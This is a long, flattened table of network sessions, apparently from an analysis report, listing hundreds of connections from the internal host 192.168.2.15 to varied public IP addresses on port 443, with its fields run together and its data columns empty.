                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17406192.168.2.15485122.151.87.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17407192.168.2.1554882165.52.36.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17408192.168.2.1550572156.35.96.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17409192.168.2.155090031.38.246.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17410192.168.2.155866654.229.183.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17411192.168.2.1553108150.42.84.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17412192.168.2.154146625.186.4.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17413192.168.2.154730842.42.14.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17414192.168.2.1533026170.217.3.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17415192.168.2.1537940145.18.204.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17416192.168.2.1539100104.187.7.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17417192.168.2.1536084133.52.246.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17418192.168.2.1559588106.149.126.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17419192.168.2.1560622223.81.16.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17420192.168.2.1560802203.87.36.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17421192.168.2.154060845.170.66.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17422192.168.2.1544494202.98.153.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17423192.168.2.153325872.160.243.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17424192.168.2.1555262194.4.18.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17425192.168.2.155229236.55.252.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17426192.168.2.1555386189.144.17.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17427192.168.2.1544052153.106.173.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17428192.168.2.1557324128.78.228.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17429192.168.2.1539750171.190.102.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17430192.168.2.1555616207.241.254.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17431192.168.2.154738664.47.11.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17432192.168.2.155211650.158.220.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17433192.168.2.1558426164.13.115.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17434192.168.2.1543862212.78.154.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17435192.168.2.1538154125.125.152.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17436192.168.2.1548224187.126.249.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17437192.168.2.1558924158.104.87.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17438192.168.2.155633885.193.117.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17439192.168.2.155045898.162.189.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17440192.168.2.1559180165.110.23.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17441192.168.2.154649642.254.46.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17442192.168.2.1543168126.133.235.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17443192.168.2.1534950209.228.158.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17444192.168.2.153551047.7.1.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17445192.168.2.1549302119.42.125.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17446192.168.2.155644449.66.150.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17447192.168.2.1557794154.133.173.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17448192.168.2.1555490111.24.45.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17449192.168.2.153945653.9.172.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17450192.168.2.155443299.9.36.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17451192.168.2.154889868.139.174.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17452192.168.2.1544724107.128.231.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17453192.168.2.155933425.110.104.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17454192.168.2.155091472.186.81.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17455192.168.2.155003412.75.125.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17456192.168.2.153425466.218.206.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17457192.168.2.155219488.234.188.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17458192.168.2.1556794216.190.239.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17459192.168.2.1544674182.218.24.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17460192.168.2.1544548218.89.140.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17461192.168.2.1552366203.112.101.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17462192.168.2.1535846155.97.252.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17463192.168.2.1556008168.55.96.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17464192.168.2.154772288.14.43.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17465192.168.2.154143689.188.176.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17466192.168.2.1540398223.123.194.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17467192.168.2.1552108166.252.255.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17468192.168.2.155749053.127.186.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17469192.168.2.155816885.237.17.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17470192.168.2.155392036.65.67.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17471192.168.2.1543362153.228.168.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17472192.168.2.153794667.178.13.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17473192.168.2.156045279.52.243.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17474192.168.2.1536370223.103.196.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17475192.168.2.1546840182.127.90.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17476192.168.2.1546222173.74.41.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17477192.168.2.155672237.117.183.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17478192.168.2.153420631.133.99.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17479192.168.2.1541942202.128.74.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17480192.168.2.153749669.227.251.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17481192.168.2.15445321.249.12.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17482192.168.2.1555768159.122.189.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17483192.168.2.1556168106.156.87.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17484192.168.2.1544070133.122.53.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17485192.168.2.1547162222.160.59.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17486192.168.2.153656046.12.159.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17487192.168.2.154884057.87.159.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17488192.168.2.155224295.50.41.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17489192.168.2.1548860181.243.28.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17490192.168.2.153329068.121.205.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17491192.168.2.1535278163.148.179.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17492192.168.2.153285035.195.149.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17493192.168.2.1535218173.103.149.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17494192.168.2.1542390198.152.155.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17495192.168.2.1548226194.155.47.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17496192.168.2.154199680.35.218.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17497192.168.2.1555258217.40.229.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17498192.168.2.1535616187.237.35.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17499192.168.2.153586234.231.233.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17500192.168.2.1551212163.172.189.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17501192.168.2.153642449.55.199.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17502192.168.2.1555810198.253.21.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17503192.168.2.1555096121.186.161.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17504192.168.2.1555034107.6.193.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17505192.168.2.1552598158.190.20.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17506192.168.2.1539544220.146.57.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17507192.168.2.1556200187.145.71.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17508192.168.2.1559836199.48.140.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17509192.168.2.1533056203.109.6.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17510192.168.2.1536894186.63.21.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17511192.168.2.1560770219.183.128.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17512192.168.2.1553088163.3.105.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17513192.168.2.1559914126.240.13.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17514192.168.2.1555820158.213.230.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17515192.168.2.1554238158.26.194.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17516192.168.2.1540816161.38.74.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17517192.168.2.1539288199.40.143.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17518192.168.2.155182074.217.195.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17519192.168.2.1547250174.142.179.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17520192.168.2.1557136209.74.114.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17521192.168.2.1544018153.181.0.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17522192.168.2.155404425.7.173.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17523192.168.2.1537612170.7.143.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17524192.168.2.1558832122.22.147.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17525192.168.2.1555064111.124.126.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17526192.168.2.154297067.201.219.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17527192.168.2.1536640178.206.43.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17528192.168.2.155973442.7.95.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17529192.168.2.155155846.148.63.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17530192.168.2.153688043.118.34.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17531192.168.2.1539560148.14.251.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17532192.168.2.1551466124.213.173.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17533192.168.2.1541202189.77.51.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17534192.168.2.1542144217.10.137.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17535192.168.2.155526042.50.224.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17536192.168.2.1548062201.213.186.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17537192.168.2.1544580101.114.50.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17538192.168.2.1533754186.188.20.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17539192.168.2.1535808130.145.186.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17540192.168.2.1540266170.249.119.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17541192.168.2.153442460.182.232.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17542192.168.2.154264266.156.199.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17543192.168.2.1544728104.121.151.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17544192.168.2.1555880154.235.214.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17545192.168.2.154579240.33.78.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17546192.168.2.1545944221.26.225.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17547192.168.2.1549956126.86.218.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17548192.168.2.1551348177.65.50.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17549192.168.2.1533524104.255.67.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17550192.168.2.154169077.73.230.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17551192.168.2.1553130140.64.53.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17552192.168.2.155163259.73.152.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17553192.168.2.1548314223.28.227.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17554192.168.2.1547146197.134.54.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17555192.168.2.1539546217.89.81.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17556192.168.2.154778450.122.131.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17557192.168.2.1559140113.167.145.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17558192.168.2.153280898.93.83.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17559192.168.2.1542358106.251.148.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17560192.168.2.155296443.155.103.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17561192.168.2.154913247.6.19.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17562192.168.2.1545930166.120.10.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17563192.168.2.1536468135.255.190.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17564192.168.2.1548976125.23.94.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17565192.168.2.153849047.92.7.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17566192.168.2.1558952176.69.243.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17567192.168.2.154560631.151.25.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17568192.168.2.1544142122.71.238.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17569192.168.2.1549536166.177.244.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17570192.168.2.153522047.161.173.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17571192.168.2.155796888.125.243.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17572192.168.2.1540596203.29.66.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17573192.168.2.155765812.138.118.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17574192.168.2.1556476197.24.106.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17575192.168.2.1549024169.178.119.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17576192.168.2.154227489.254.110.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17577192.168.2.1553742108.140.241.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17578192.168.2.1560138122.250.36.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17579192.168.2.1542928154.176.110.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17580192.168.2.1557928183.203.108.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17581192.168.2.1559158113.96.139.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17582192.168.2.1539866223.210.39.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17583192.168.2.1539656194.192.225.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17584192.168.2.1546508126.247.223.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17585192.168.2.15333525.41.89.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17586192.168.2.1540040207.151.152.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17587192.168.2.1549052207.6.37.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17588192.168.2.154793671.93.1.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17589192.168.2.1542958167.69.96.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17590192.168.2.1558158162.96.21.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17591192.168.2.1554662185.239.48.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17592192.168.2.153347438.109.210.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17593192.168.2.154427047.63.233.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17594192.168.2.1559284177.173.98.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17595192.168.2.1549826204.245.255.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17596192.168.2.155572492.109.87.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17597192.168.2.153774483.77.194.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17598192.168.2.155318840.228.204.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17599192.168.2.1559686192.22.59.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17600192.168.2.1552646119.206.94.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17601192.168.2.1558514201.160.209.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17602192.168.2.1541396162.206.41.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17603192.168.2.1541756104.24.78.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17604192.168.2.1536734175.85.125.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17605192.168.2.1546650194.80.111.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17606192.168.2.154452065.156.52.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17607192.168.2.154612232.111.252.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17608192.168.2.1554314184.171.120.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17609192.168.2.154806068.215.29.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17610192.168.2.1540648183.101.105.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17611192.168.2.1557812141.234.180.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17612192.168.2.1549592133.171.34.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17613192.168.2.155014249.2.190.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17614192.168.2.153814667.230.35.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17615192.168.2.154743025.241.4.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17616192.168.2.154908254.76.103.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17617192.168.2.1559388117.84.204.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17618192.168.2.1538044114.130.17.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17619192.168.2.1540940223.31.34.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17620192.168.2.153784692.21.58.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17621192.168.2.154580472.70.35.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17622192.168.2.1557080160.188.205.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17623192.168.2.15587801.93.78.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17624192.168.2.1556448191.210.245.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17625192.168.2.1534836153.93.106.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17626192.168.2.1534666220.44.32.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
